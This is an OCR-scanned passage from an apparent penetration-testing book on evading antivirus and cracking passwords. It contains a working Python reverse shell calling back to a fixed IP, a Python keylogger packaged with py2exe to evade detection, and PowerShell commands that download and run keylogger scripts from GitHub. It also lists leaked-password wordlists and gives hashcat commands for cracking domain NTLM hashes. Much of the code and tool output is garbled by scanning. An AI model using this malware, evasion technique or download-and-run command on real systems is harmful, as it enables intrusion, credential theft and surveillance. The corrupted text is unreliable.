normally. When executing, you will notice it does take longer before it runs after execution due to all 
the extra instructions added by peCloak.py. 


1010.90 
20910-26 









peCloak 


ps 


py- Cave Jumps 


When running the obfuscated wce.exe file through VirusTotal, we find that it doesn’t get picked up by 
many of the common corporate AV solutions. 


SHA256 6195014349811992230с086090987208с12278а9793270а0509226а5761а10а! Ф" 
File пате cloaked.exe 


Detection ratio 7/57 @ 0 a 

Analysis date 2015-03-21 23:19:38 UTC ( 1 minute ago ) 
fm Analysis Q File detail © Additional information @ Comments € Votes ЇН Behavioural information 
Antivirus Result Update 
Zone! © 150320 
2йуа © 032 
ViRobot o 0: 
VIPRE © 20150321 
VBA32 Malware-Cryptor General 3 20150321 
TrendMicro-HouseCall © 20150321 
TrendMicro © 20150321 
TotalDefense © 20150321 
TheHacker © 20150321 
Tencent Trojan. Win32.Qudaman.Gen.2 20150322 
Symantec © 20160321 
SUPERAntiSpyware © 20150321 
Sophos © 20150321 


Virus Total Results 


Remember, this is really beta code, but I wanted to demonstrate how you can write your own 
obfuscators. 


Python 


Python is your best friend. I use Python to create most of my exploits and tools. There are several 
reasons why Python works so well. First, it is common to see systems which white-list applications 
that allow python files. Second, you can very easily add randomness to get around any signature. And 
third, using something like py2exe you can turn the file into a self-running executable. 


Python Shell 
Watching Dave Kennedy's talk at BSides in 2012{45}, took me down the track of using Python to 


create malicious payloads. The simplest example of this was creating a python shell and wrapping it 
up with py2exe. 
e #!/usr/bin/python 

import socket, subprocess 

HOST = '192.168.10.100' 

PORT = 5151 

s = socket.socket(socket. AF INET, socket.'SOCK_ STREAM) 

s.connect((HOST, PORT)) 

s.send('[*] Connection Established!) 

while 1: 


data = s.recv(1024) 
if data == 'quit': break 
proc =  subprocess.Popen(data,  shell-True, stdout=subprocess.PIPE, 
stderr=subprocess.PIPE, stdin=subprocess.PIPE) 
stdout_value = proc.stdout.read() + proc.stderr.read() 
s.send(stdout_value) 
s.close() 


When this code executes, it will create a shell connection back to 192.168.10.100, where I will have 
netcat listening on port 5151. This reverse shell will give me command line access into the host. 
Using pyinstaller, we can convert the python file into an executable: 
e C:\python27\python.exe C:\utils\pyinstaller-2.0\pyinstaller.py --out=C:\shell\ -- 
noconsole --onefile C:\shell\shell.py 


Again, if you try to scan this file with AV, it won't be picked up. 


Python Keylogger 
Everyone uses different types of keyloggers and this is no different. My goal was to develop 


something that would most likely be accepted on white-listed application lists and be able to run 
undetected by AV. Included below is simple code to have python start recording all keyboard 
presses: {46} 
ө import pyHook, pythoncom, sys, logging 
file log ='C:\\systemlog.txt’ 
def OnKeyboardEvent(event): 
logging. basicConfig(filename=file_ log, level=logging DEBUG, format='%(message)s') 
chr(event.Ascii) 
logging.log(10, chr(event.Ascii)) 
return True 
hooks manager = pyHook.HookManager() 
hooks manager.KeyDown = OnKeyboardEvent 
hooks manager.HookK eyboard() 
pythoncom.PumpMessages() 


Here is my setup.py file: 
e from distutils.core 
import setup 
import py2exe 
setup(options = {'py2exe': {"bundle_files': 1, 'compressed': True} }, 
windows = [ {'script': "logger.py"} ], 
zipfile = None, 


And using py2exe, I will convert the python script to an executable with the following commands: 
e python.exe setup.py install 


e python.exe setup.py py2exe 
Now I will have an executable binary of the keylogger that records all keystrokes and stores all of the 
key strokes to C:\systemlog.txt. Pretty simple and easy and AV never detected it. If you need to, you 
may add some randomness in there to make sure that it isn't picked up by signatures or hash matching. 


Other Keyloggers 


Being able to drop an undetectable keylogger can make a huge difference in situations where you 
can’t pull passwords from memory or look for web-based passwords. I will show you two different 
examples that can be executed from a command line. 


Keylogger Using Nishang 
(https://github.com/samratashok/nishang): 


Nishang is a collection of PowerShell scripts used for pre/post exploitation. One of the scripts is 
called keylogger.psl. As I keep reiterating throughout the book, and as you will notice in different 
penetration tests, nothing ever works perfectly. You will need to know different ways to execute 
commands and understand that different environments may or may not allow you to do certain things. 
In this case, we assume that we have a shell on the system. We are going to use bitsadmin, which is 
used by Microsoft Windows to download updates, to download our keylogger and put it in the public 
folder. We will then go to the public folder and execute the keylogger. The keylogger has many other 
functions, such as pushing the logs to Twitter, so I recommend you read through it before executing 
anything. 

e cmd.exe /c  "bitsadmin  /transfer  myjob  /download  /priority high 

https://raw.githubusercontent.com/cheetz/nishang/master/Gather/Keylogger.ps 1 

c: Users Public Keylogger.ps1" 

e cd Nusers public 

e powershell.exe -NoP -W Hidden -exec bypass -noexit -Command 

" \Keylogger.ps1 http://127.0.0.1 stopthis" 


The output will be located at: 
e C:\Users\[ Account]\AppData\Local\Temp\key.log 


Note that when looking at the file, it is obfuscated and needs to be converted. Once you move this file 
onto your box, convert the logs using the PowerShell script located here: 





Here is the command to convert the logs: 
e powershell.exe -exec bypass -Command "& {Import-Module . Parse Keys.psl; 
Parse Keys key.log output.log}" 


And your decoded keylog output file is written to output.log. 


Keylogger Using Powersploit 
(https://github.com/mattifestation/PowerSploit): 


The other keylogger with which I have had some success is the Get-Keystrokes PowerShell script. 
Similar to running the Nishang script, this can be executed by the following command: 
ө powershell.exe -exec bypass IEX "(New-Object 
Net.WebClient). DownloadString(‘https://raw.github.com/cheetz/PowerSploit/master/E 
Keystrokes.ps1');Get-Keystrokes -LogPath C:\Users\Public\key.log" 


e 
Conclusion 


There are many different techniques to evade AV. Although this is not a complete list, this should give 
you a good overview on where to start if you are battling anti-virus. The last thing you want is for AV 
to stop you from popping a box that you can potentially exploit. 


Penetration testing 1s all about trying out different tools, techniques, and tactics to find what works in 
that particular environment. Remember not to submit your executable to a repository like Virus Total, 
as the lifespan of your executable might shrink dramatically. 


Special Teams - Cracking, Exploits, And Tricks 


This section focuses on all other methods that can assist in penetration testing, but do not fit in the 
other sections. I will discuss some of the tips and tricks I have for cracking password hashes, 
searching for vulnerabilities, and some short cuts. 


Password Cracking 


There are many different tools to use with password cracking, however, I am going to focus mainly on 
two tools that I use. These two tools are John the Ripper (JtR) and oclHashcat. These are both 
excellent tools for cracking passwords. 


Before I can start talking about different password crackers, it is important to make sure you 
understand the basic definitions. The three configurations you should generally make for an efficient 
password cracking process are to define wordlists, rules, and hashing algorithms. 


Wordlists: This is exactly what it sounds like—they are files that contain password lists in cleartext. 
The password cracker software will try to hash each one of these passwords and see if they match the 
hash that you are trying to crack. 


I generally like to take wordlists from prior password compromises and incorporate them with the 
type of organization you are dealing with. For example, if you are cracking NTLM hashes from a 
domain controller, make sure you understand what their password policy is. There is no point trying 
four or five-letter passwords if they require a minimum of eight characters. 


Here are some of my favorite wordlists: 

List Name: RockYou 

Details: Compromised in 2009 froma social game and advertising website. This is a great list to start 
with as it isn't too large and contains a lot of the common passwords with a decent success rate. 
Download Link: 

http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 


List Name: Crackstation-human-only 
Details: Real human passwords leaked from various website databases. There are about 64 million 
passwords in this list. GZIP-compressed. 247 MiB compressed. 684 MiB uncompressed. 


Download Link: 
https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 


List Name: Crackstation-Full 
Details: Full crackstation passwords leaked from various website databases. Extremely large. GZIP- 
compressed (level 9). 4.2 GiB compressed. 15 GiB uncompressed. 


Download Link: 
https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 


List Name: m3 g9tr0n_ Passwords WordList CLEANED: 
(http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha 1-and-md5-hashed- 


passwords) 





Details: List of 122 million passwords 


Download Link: 
http://bit.ly/KrTcHF 


List Name: Ten Million Passwords 
Details: A researcher Mark Burnett combined all the recent password dumps and compiled a list of 
the top ten million passwords. 


Download Link: 
https://xato.net/passwords/ten-million-passwords/ 
ө Torrent File: magnet:? 
xt=urn: btih:32E50D9656E101F54120ADA3CE73F7A65EC9D5CB&dn=1 0-million- 
combos.zip&tr=udp%3a%2f%2ftracker.leechers- 
paradise.org%3a6969&tr=udp%3a%2f%2 ftracker.coppersurfer.tk”%3a6969%2 fannout 
paradise.org%3a6969%2fannounce&tr=http%3a%2f%2 fbt.careland.com.cn%3a6969°% 
e To create a unique list of just passwords: 
e unzip 10-million-combos.zip 
e cut -f2 10-million-combos.txt | sort -u> 10-million-unique.txt 


List Name: Wick2o's Password List from Dump Monitor 

Details: Wick2o monitors leaks on pastebin and similar sites. 

Download: git clone https://github.com/wick20/Dump-Monitor-WordLists.git /opt/Dump-Monitor- 
WordLists 


Other places to get passwords or password lists: 


e https://github.com/danielmiessler/SecLists/tree/master/Passwords 
e https://archive.org/details/pastebinpastes 

e https://wiki.skullsecurity.org/Passwords 

e http://www.leakedin.com/tag/emailpassword-dump/ 


e https://www.reddit.com/domain/pastie.org/search? 
q-password--leak&sort-relevance&t-month 
e Scraping all pastebin/pastie/... sites 


Rules: Rules define if any modifications need be injected into the wordlist. The best way to describe 
rules is by an easy-to-follow example. We can take and use the KoreLogicRulesAppendYears 


(http://contest-2010.korelogic.com/rules.html) set of rules, which look like the following: 


e cAz"19[0-9][0-9]" 
e Az"19[0-9][0-9]" 
e cAz"20[01][0-9]" 
e Az"20[01][0-9]" 


It will append the years from 1949 to 2019 in each and every password. If the password list 
contained the word "hacker", it would try to crack the hash for the string hacker1949 all the way to 
hacker2019. Remember, the more complex rules you have, the more time it will take to finish going 
through all the different words in the word list. 

Hash Algorithms: A hashing algorithm is used to generate the password hash. These are very 
important because if you select the wrong algorithm, it will either fail to run or fail to crack. For 
example, if we select the MD5 algorithm for SHA1 hashes, the cracking tools will not find any hashes 
to crack and will exit immediately. 


Now that we have basic understanding of different cracking configurations, let's compare John the 
Ripper versus oclHashcat. 


John The Ripper 
(http://www.openwall.com/john/) (Windows/Kali Linux/OS X): 


I used to regularly use John the Ripper (JtR) but moved away from it a while ago due to the GPU 
support from oclHashcat. However, JtR Jumbo does have CUDA and OpenCL support now. Here is a 
list of JtR hash formats to help you identify which type of password you are cracking: 
http://pentestmonkey.net/cheat-sheet/j ohn-the-ripper-hash-formats. 


Cracking MDS5 Hashes 
Let's say you are able to compromise a “nix system or maybe a database full of password hashes. You 


will most likely run into MD5 or SHA hashes, but for the following example, we will assume that 
they are non-salted MD5 hashes. If you are looking to crack standard MD5 hashes, the basic 
command is: 

e john -format=raw-md5 -pot=./list.pot md5list.txt 


This will tell john the ripper to look in the md5list.txt file for MD5 hashes and write any cracked 
passwords into the file list.pot. 


root@kali:~# john --format=raw-md5 --pot=./list.pot md5list.txt 

Loaded 3 password hashes with no different salts (Raw MD5 [128/128 SSE2]) 
test (test) 

password (user) 

woot (hacker) 

guesses: 3 time: 0:00:00:01 DONE (Sun Dec 29 18:32:12 2013) 


If you are using the JtR Jumbo pack and want to take advantage of GPU processing: 
e john --format=raw-md5-opencl --wordlist-./Wordlists/all.lst --rules: Single 
md5list.txt 


Here are additional sources on using JtR: http://blog.thireus.com/cracking-story-how-1-cracked-over- 
122-million-shal-and-md5-hashed-passwords. 


OclHashcat 
(http://hashcat.net/oclhashcat/)( Windows/Kali Linux): 


Honestly, this is the tool I use most when password cracking. As we all know, graphic processing 
units (GPUs) are great for cracking passwords as they utilize many different cores in parallel. The 
advantages of using GPUS vs. CPUS are very significant and this can be demonstrated with the use of 
oclHashcat. 


In the following examples, I am going to go over cracking WPAv2 and NTLMv2. These are the most 
common hash types I run into and they are typically the groundwork for any other types of hashes. If 
you want to see all the different hash types that oclHashcat will support, visit their website at 


http://hashcat.net/oclhashcat/. 


Cracking WPAv2 
In the beginning of the book, I discussed how to capture the WPAv2 handshake, which is required for 


password cracking. The output from the capture was a .hccap file. This is the file format that 
oclHashcat supports for brute forcing WPA-hashed passwords. 


In the following examples, I am going to utilize oclHashcat on my Windows host using a GeForce 
GTX 680. Generally, I prefer using the ATI Radeon cards, but for this example, it won't make much 
of a difference. To kick off the password cracking, I will use the command: 

e cudaHashcat-plus64.exe -m 2500 out.hccap list\rockyou.txt 


: \oc lHashcat-plus-8.145cudalashcat-plus64.exe -m 2500 out.hccap list’ 
udaHashcau-yius uH.14 by atom starting... 


lashes: 1 total, 1 unique salts, 1 y digests — 
HM: 8 bits, 256 entries, ЙХӢВВВВИҒГ mask, 1024 bytes 
ules: 1 

orkload: 16 loops, 8 accel 

Watchdog: Temperature abort trigger set to 90с 


latchdog: Temperature retain де чы set to 88c 


Device #1: GeForce СТА 680, 2848MB, 1858Mhz, 8MCU 
Device #1: Kernel ./kerne1s/4318/n25BB. sn. 38.64. ptx 


“ache-hit dictionary stats list\rockyou.txt: 139921497 bytes, 14100049 


[sltatus [plause [rlesume [blypass [q]uit => „ 


oclHashcat Example 





This is a very straightforward example, which says to crack WPAv2 hashes against the out.hccap file 
and use the password list from rockyou.txt. 


Cracking NTLMv2 
If you have compromised a Windows Host or maybe a Domain Controller, you will have to crack 


NTLM hashes. You can always try to crack the LM hashes, but they are becoming more and more 
difficult to find, so we will stick with the NTLM hashes. 


In the following example, we are taking a list of NTLM hashes and using the rockyou password list. 


‘oc Hasheat-plus-@.15 >cudaHasheat-plus64.exe -a 1888 НТМ. ехе Llist\rockyou.txt 
udahasheat=plus 00.15 by atom starting... 


ger set to Bic 


"gU uu ME 
Device #1: Kernel ./kernels/4318/n188B aB.sn 38.64.ptx 
Device #1: Kernel ./kernels/4318/bzero.64. ptx 


Cache-hit dictionary stats list\rockyou.txt: 139921497 bytes, 14343296 words, 1 


9 745edh37efceef ab hObsedf4c77d71: password! 
pi17525b345470c29ca3d8aeAhS56ba8: hacker 


Started: Моп Dec 09 09:41:45 2013 
Stopped: Mon Dec 07 09:41:58 2013 


oclHashcat NTLM 





From the example above, there were three unique passwords, but oclHashcat was only able to crack 
two of the three passwords. To increase our chances, I am going to add the passwordspro rule set to 
assist with the rockyou password list. If you want to get a little deeper into understanding these rules, 
try starting at the oclHashcat page: 

http://hashcat.net/wiki/doku.php?id=rule_based_attack. 


Coe Hasheat=plug-8,15 oudalashoat=plugh4.axe =n 1000 MILA. tet аеоси, хі = Реан Ро rule 
TUTTI URS BERE LETT LU T 


дане J total, 1 шаба salta, 3 unique digests 
Шир 0 bite, 256 entries, МШШ пази, 1024 bytes 
Шин: Jdi 
TU S12 loopa, O accel 
ш! Temperature abort om get to 900 
atchdog! Temperature мш trigger dat to Bk 
Novica HH: GePorca СТИ 600, М, 10580, 000 
vice TL! Kernel КҮЛТҮГҮ id gti 
dee Hii are] Мнн. bd tx 


ache-hit dictionary stata Liat\rockyou.tet? 19921497 їн, 14043296 words, 45062292796 инин 


Ивар гейове Pus Jest г passo! 
ШАШ cad ae ba: hacker? 
нш ИТ ИҢЛИ 
TAUIA. MT Trias 
Wo ( | | " lu 
| lii. rinni" i АН paliw) Am 
D o" i Pile (ачса tut) 

ah. larget....i Pile IA tet) 

Hash, Types seas MELA 


oclHashcat with Rules 


Using the rules didn't actually find the password for the third hash. In larger password hash lists, this 
would have definitely found more passwords, but was only able to find two out of the three 
passwords in this scenario. 


To increase our chances even more, I will try a much larger password list. This, of course, increases 
the amount of time needed to run this job. However, if it resolves a password, it will be worth it. The 


command to use is: 
e  cudaHashcat-plus64.exe -m 1000 | NTLM.txt —listwealhuman.txt -r 


rules\passwordspro.rule 





Giroc Hasheat-plus-@.15 eudatasheat-plush4.exe -a 1000 NILA. txt Пача алал. хі -P ruler passwordspro. rul 
udahaahcat=plus ий. by atom starting... 


Hashes: J total, 1 unique salts, J unique digests 
ea 296 entries, ТУТ nask, 1824 bytes 
rues 2141 

prkload: S12 loops, 88 accel 

atchdog: Temperature abort trigger set to Ie 

latchdog: Tenperature retain tr P iat to fie 

Dev ice li: Ge orce GIA БЕ, МН Mi Mu 

Device И: bm К ВИО 20, ва 30,64, рех 
Device Fii Kernel ./kernelo/4318/haero.64. ptx 


Gacha=hit dictionary state listħraalhuman txt: ПЕНЫ bytes, 6270055 words, 200207245355 keyepace 


f UM i | T | 

УТА. Т pons à 

Apre Hi Pile “te 1 " ч le) 
Rules. ШИ 2.0 137111. 14 017 „Р 

Input „Мо eb. si Pile Cllatsrealhuman.txt? 

ash. Target... File ИТІМ, Ext? 

ТАТТЫ!!! 

Tina Startad... i Моп Dec 00 07143150 ЕТТУ 
ar Hon 3 = а 2813 (3 nins, 14 ance) 
JI" 168. 
Wecovered......! Tr u p4 Digesta, 671 (0.00) Balta 
РРО Таа. „оао 1416772007208 97145355 (5.92%) 
va Т 476270 0461677230 (0,5) 

"C NE 0x Util 55 (UN TBI, 


ДИЙ ИТИЛ 7 7саат Бете: 1оревсесре ] 


oclHashcat with Different Password List 























As you can see from the results, the new password list and rule set recovered the third password. Just 
by playing around with different password lists and rule sets, you can quickly find out what works 
and what just takes too long to run. This is all based on what types of GPUs you have, how long the 
password lists are, and the complexity of your rule set. 


Whether you want to crack MD5 hashes, MSSQL hashes, ЅНА І hashes, or others, this same query 
can be run by changing ће "-m" parameter. For a full listing of hashes that oclHashcat accepts and 
cracks, go to: 


Cracking in Real Life 
You were able to successfully dump the Domain Controller. The next step is to see what you are able 


to recover. Historically there were Rainbow tables, but with minimum length restrictions, size and 
time became a huge issue. Trying to create Rainbow tables for 10+ characters becomes so expensive 
that it isn’t really usable on a penetration test (unless you find LM hashes). 





oclHashcat is the fastest password recovery tool that I have ever dealt with. I have used John the 
Ripper and other tools, but due to the use of GPUs, rules, pre-processing, and password lists, I 
generally turn to oclHashcat as my go-to password-cracking tool. This chapter will talk about how to 
effectively use oclHashcat in a pentest and will mostly focus on cracking NTLM hashes; however, 
you can use these examples with any hashes. 


My password cracking rig was presented in the Pre-Game phase and with a little bit of money, you 
can be running your own password cracking monster. 


So, you were able to extract the SUCK Domain Controller hashes. The next step is to be able to see 
what you can recover from those hashes. In our example, we are using a password dump similar to 
what I have seen in the field. Our compromised DC has a list of over 21,000 hashes. We could first 
start by straight brute forcing through all the characters, but is this really feasible? Let’s see by 
running the command: 

e oclHashcat64.exe -m 1000 hashes hashes.Ist -a 3 ?а?а?а?а?а?а?а?а --force 


Command Breakdown: 
e oclHashcat Executable: oclHashcat64.exe 
e -m 1000: The hashes we are supplying are in the format of NTLM 
e hashes\hashes.list: Stored location of the Domain Controller Hashes 
e -a 3: using brute-force Attack mode (using a mask below) 
e ?a?a?a?a?a?a?a?a: 8 combination of letters, numbers and special (upper/lower 
case) characters 


This definitely isn’t the most efficient way to crack hashes, but it can really cover those odd 
passwords like Jdkl!3vG that might not be in a password list. Masks will be very important to learn, 
so if you haven’t dealt with them before, make sure to check out oclHashcat’s site: 


https://hashcat.net/wiki/doku.php?id=mask_attack. 


Remember that we are going for speed and efficiency on a test, so let’s see what results the brute- 
force attack will provide: 


Session.Name...: ос lHashcat 
Aborted 
Input . Моде Mask (fafafafafafafafa) [8] 
sl eret : File &hashes*hashes.lst? 
: NILM 
бип Jan 18 16:43:57 2015 (14 secs?) 
б гъа ge Thu Jan 22 17:37:23 2015 <4 rag B hours) 
Speed.GPl.#1...: 9557.0 MHs 
Speed. GPU.#2...: 160268.8 MH73 
Speed. GPU. 8%. ..: 19825.8 MH73 
Recovered 0721318 (0.002? Digests, 0/1 (0.007) Salts 
| 267556585472 7663 4204912890625 0.007 > 
07267556585472 CB.HBz» 
: 67267556585472 (0.007) 
42% Util, 45c Temp, N/A Fan 
Mon . GPU . 112 . . : Hx Util, 44с Temp, N/A Fan 


Started: Sun Jan 18 16:43:57 2015 
stopped: Sun Jan 18 16:44:12 2015 


(c=: Users cheetzsDown loads*oc lHashcat—1.32>0c lHashcat64.exe -m 1000 
hashes*hashes.lst -a 3 ?а?а?а?а?а?а?а?а --force 
oclHashcat Brute-Force 





We can already see that this 1s going to take four days to go through all eight characters. We could use 
smarter masks based on human tendencies. We know that if there are password requirements, such as 
upper/lower/special character, most people put the capital letter in the front, the special character at 
the end. We could create these custom masks to better improve efficiency, but this will still take a fair 
amount of time. 


For efficiency sake, the next best step is to start testing large password hashes. We are going to focus 
on using two different password lists: Crackstation and m3gOtr0n Passwords. It is important for you 
to find out which password lists work well in various industries. Let's start with the Crackstation list, 
which contains roughly 64 million passwords: 
e oclHashcat64.exe -m 1000 hashes\hashes.Ist lists\crackstation_realhuman_phill.txt - 
-force 


The results below on the left show that in six seconds, we were able to test all the hashes against the 
password list. Using the Radeon R9 295x2, we are able to get some great speed against these lists. 
Unfortunately, the results from these hashes are pretty low with 780 or about 3.66% passwords 
recovered. 


The next step is to run the hashes against rules. Luckily, oclHashcat has provided a list of great rules 
to run. They are located inside the oclHashcat directory, in the rules folder. I recommend going 


through each of them and understanding what the differences are between the rules. In the next 
example, we are going to use the same password list and, this time, incorporate a great rule set: 
e oclHashcat64.exe -m 1000 hashes\hashes.Ist lists\crackstation_realhuman_phill.txt - 
г rules\InsidePro-PasswordsPro.rule --force 


? bb4dGdadb164863a8 Giddaf bd5339hb:Zxcubnm4 
в93Ь2е2а6Ьс9061'7360240364310'7?а8 = Zxcv1234 
§21852686c46e1d38dacdac8chhal 9b? : 2хсуһпт8 


Session.Name...: oc lHashcat 
a ioe aa Exhausted 
e.....: File ¢lists\crackstat_realhuman_phill.txt> 
её... .: File thashes*hashes. lest? 
| MM Е NT LM 
Sat Jan 17 13:50:34 2015 6 secs> 
И secs 
6633.4 kH/s 
Speed.GPU.8#2...: 5089.6 kH/s 
Speed.GPu.#*...: 11723.08 kH/s 
Баала 780721318 (3.66%) Digests, 0/1 0.0055 Salts 
eeeeeee: 63768655763768655 100.00 > 
ГРЕЧ 0763768655 (8.868%) 
rere, A 6163987634768655 (0.9779) 
81x Util. 37c Temp. N/A Fan 
; 6% Util, 37c Temp, N/A Fan 


Started: Sat Jan 17 13:50:34 2615 
Stopped: Sat 17 13:56:45 2615 


oclHashcat — Wordlist Cracking 





9 bbb4dGdadb164863a8 Giddaf bd5339b:Zxcubnm4 
e 93 b2e2a6 hdc 9861 73602460364b107a8 = 2хсџ1234 
421852686c46e1d38dacdac8chbhal Pb? КА АТ] ш: 


oc lHashcat 
Exhausted 
‚ File ¢lists\crackstat_realhuman_phill.txt> 

File Chashes‘hashes . lst > 

NTLM 

Sat Jan 17 13:50:34 2015 <6 secs? 

Й secs 

6633.4 kH/s 
Speed.GPU.#2...: 5089.6 kH/s 
Speed.GPU.#*...: 11723.80 kH/s 
CTI 7807/21318 (3.66%) Digests, 0/1 (8.60%) Salts 

63768655/763768655 (166.88) 
6763768655 СИ.ЙЙх» 
616398763768655 <6.9'7%> 
81% Util, 37c Temp. M/A Fan 
WMon.GPU.#2...: @% Util, 37c Temp, N/A Fan 


Started: Sat Jan 17 13:50:34 2015 
Stopped: Sat Jan 17 13:56:45 2615 


oclHashcat - Wordlist Cracking 





In the image above on the right, by the using rules, we are processing about 7 million hashes a second, 
which took about 40 seconds. Still well within our time limit, we have now cracked 3896 or 8180 
hashes. This is now looking positive. Let's throw another password list at it this time. From the prep 
stages, we should have the eNtrüpY ALL sort uniq.dic that we can use: 
e oclHashcat64.exe -m 1000 hashes\hashes.lst lists\eNtrOpY ALL sort uniq.dic -r 
rules\InsidePro-PasswordsPro.rule --force 


sh8ec55 70397e6 7bdl 928.a97928118 78: Xenogears85 
>2bce8a865b192ca71521b135c8 ES CETT ULT: 
129 e35Scheb2f 460830b583299F 34:Yours1968 
a58520422a09d8989b12618caf e683: WrigleY3 


session.Name...: oclHashcat 
: Exhausted 
: File (rules\InsidePro~PasswordsPro.rule> 
: File (lists\eNtr@pY_ALL_sort_unigq.dic> 
ves\hashes. lst) 


secs) 


Speed.GPU.#1...: 6302.1 MH/s 
speed.GPU.#2...: 3026.6 MH/s 
Speed. GPU. #*...: 28.7 MH/s 
Recovered : 733721318 (58.35%) Digests, 0/1 (8.00%) Salts 
: 2 K 262755863378 100.00; ) 
55863376 (0.007) 
55863370 (0.007) 
Util, 45c Temp, N/A Fan 
0х Util, 45c Temp, N/A Fan 


Started: Sat Jan 17 13:58:05 2015 
Stopped: Sat Jan 17 13:58:40 2015 





>:\Users\cheetz\Down loads\oc lHashcat~1.32>0c lHashcat64.exe -m 1000 hashes 


oclHashcat - Adding Rules 


This took about the same amount of time for 122 million passwords, but we were able to go from 
38% up to 50% of recovered hashes in under a few minutes total. 


We can keep playing around with additional rules and make small gains, but at some point the rules 
will stop making a difference. We need to find new words to add to our password list. 


e oclHashcat64.exe -m 1000 hashes\hashes.Ist lists\eNtrOpY ALL sort uniq.dic -r 
rules\InsidePro-HashManager.rule —force 


ddd8'7b14ccdhi19b5eeBBddB7bca72ddB: 7Youhastards 
je1c9284e55f 74806 3f chSechib5ieee: yvonne851 


session.Name...: oc lHashecat 
: Exhausted 
Rules .T ype : File &rulessInsidePro-HashManager. rule? 
Aur real File Xlists*eNtrÜpY ALL sort uniq.dic) 
ash. larget.... : File Chasheshashes. lst) 
Hash. Type : NTLM 
ime .Started...: Sat Jan 17 14:64:38 2015 (50 secs) 
ine Estimated, : Ж sec 
speed. GPU. RIL... 5047. ? ШЖ. 
speed. GPU. {2...: } 


Recovered......: 11682721318 (54.80%) Digests, O71 СИ.) Salts 
| s.: 538478030090/538478030090 (100.80) 
THE WELL DRLEECMN IT 
: 7538478030098 CB. H8»? 
woe: 785 Util, 5ic Temp, N/A Fan 
Моп CPULH2. : х Util, 52c Temp, N/A Fan 


Started: Sat Jan 17 14:04:38 2015 
stopped: Sat Jan 17 14:05:29 2015 


C= \Users\cheetz\Down loads\oc Hashcat-1.32 0c lHashcath4.exe -m 1604 ha 





oclHashcat - Additional Password Lists 





Back in the prep stages, we created some custom password lists using two tools, Wolfhound (for 
words from Twitter/Reddit/Websites) and the custom webscraping tool. Let's take those lists and run 
some additional cracks against them: 


e oclHashcat64.exe -m 1000 hashesWMashes.lst lists 10k апа scraped passwords.txt - 
r rules\InsidePro-PasswordsPro.rule --force 


INFO: approaching Final keyspace, workload adjusted 


session. Мале... : oc IHashcat 
EACUS агава : Exhausted 
Rules. PPP : File <rules\combinator.rule> 
Input .flode..... : File (lists\scraped_passwords.txt? 
ash. Target : File Chashes\hashes. 1st) 
aah. Type Sewer : NILA 
lime .Started...: 0 secs 
ime .Estimated.: И secs 
speed. GPU.#1...2 13568.9 kis 
speed.GPU.#2...: 38558.3 khs 
speed.GPU.#*...: 52119.3 PC 
Recovered......: 11796721318 (55.31%) Digests, G71 (8.00) Salts 
һора... „i 200520200520 (100.00) 
Skipped. RR Й/200520 (8.08%) 
Rejected.......: B/288528 (8.68%) 
iWHon.GPU.#1...: 13% Util, 36c Temp, N/A Fan 
iWMon.GPU.#2...: Hx Util, 38c Temp, N/A Fan 


started: Sat dan 17 17:30:30 2015 
‘topped: Sat Jan 17 17:38:32 2 


C: Wsers\cheetz\Down loadsoc lHasheat-1.32>0c lHashcat64.exe -m 1888 hashe 
oclHashcat - Custom Password Lists 





We now are at 55% of passwords cracked, but still have a long way to go. 


Prince: 

Prince is a password guess generator and can be thought of as an advanced Combinator attack. Rather 
than taking input from two different dictionaries and outputting all the possible two-word 
combinations, Prince only has one input dictionary and builds "chains" of combined words 
(http://reusablesec.blogspot.com/2014/12/tool-deep-dive-prince.html). Prince was introduced in late 
2014 to advance the attacks on password guessing. As more and more people started using complex 
passwords, following the example set by this xkcd comic strip, http://xkcd.com/936/, it became 
harder to password guess. 


What Prince does is take a password list and generates all the different combinations it can. If you 
have a list with: 

ea 

e cat 

e house 


It will build a list of passwords: 
e acat 
e ahouse 
e acathouse 
e ahousecat 
e cata 
e cathouse 
e catahouse 
e cathousea 
e ... and so on. 


Using this technique, we can take some of our favorite password lists and generate great password 
combination lists. We will start with a small list of passwords, add our custom words and start 
building from there. In this case, I used the following password list, which had a good number of 
basic passwords: 


e https://raw.githubusercontent.com/discourse/discourse/master/lib/common passwor 
common-passwords.txt 


Next, I added the words scraped from the Bloodhound and Webscraper examples. In total, I have 
about 15,000 words to create these different password lists. For example: 


e princeprocessor-0.19\pp64.exe --pw-min=9 --pw-max=10 -o pp.txt < 
lists\10k_and_scraped_passwords.txt 


Command Breakdown: 
ө princeprocessor Executable: pp64.exe 
e --pw-min=9: Minimum password length of 9 characters 
e --pw-min=10: Minimum password length of 10 characters 
e -o pp.txt: Output to a file called pp.txt 
e < [ists 10k апа scraped passwords.txt: List of 10k wordlist and scraped words 
e *One additional optional flag is to use --elem-cnt-max=NUM. This defines how 
many words can be put together to make a chain. 


The output of pp.txt is about 272 MB. If we take a look at the files, we see the combined wordlists. 





У C:\Users\cheetz\Downloads\oclHashcat-1.32\pp.txt - Notepad++ 





File Edit Search View | Encoding Language Settings Мас 


O88 258! |2 e| & ^| 








Prince - Password Generator 


As we see from the pp.txt file above, there are words that we would never have had in our original 
password list. What if we create a file with passwords sized between 10-12 characters? 


e princeprocessor-0.19\pp64.exe --pw-min-10 --pw-max-12 -o рр10 12.txt < 
lists Ok and scraped passwords.txt 


The new file size is now 61GB. This shows that the file sizes grow exponentially and can get 
extremely large very quickly. What if we run the 10-12 character Prince-generated wordlist against 
our DC hash dump? 


e oclHashcat64.exe -m 1000 hashes\hashes.Ist pplO 12.txt -r rulesWnsidePro- 
HashManager.rule --force 


fe55ad589c36972bd6e13d477b45 7e3d: 
cbh762ffe6d46a33326449b03d410Jel: 
908bh4162d8e4b4868Aid8dbef8517bae : 


Session.Name...: oclHashcat 
: Exhausted 
>S. Type : File Crules\InsidePro-HashManager. rule? 
Input . Моде : File (pp1@_12.txt) 
: File Chashes\hashes. lst) 
: NILM 
) secs? 
Й secs 
Speed.GPU.#1...: 5342.5 MH/s 
Speed.GPU .# : 4675.1 MH/s 
Speed.GPU.&*...: 10017.6 МНиз 
: 11920/21318 (55.924) Digests, 6/1 (8.68%) Salts 
: 36872540256914/308 72548256914 (1900.007) 
: 0730872540256914 (0.9007) 
: 0730872540256914 (8.08%) 
1005 9% UCL 66 Temp, N/A Fan 
HWMon.GPU.82...: 0х Util, 7@c Temp, N/A Fan 


Started: Sun Jan 18 11:10:04 2615 
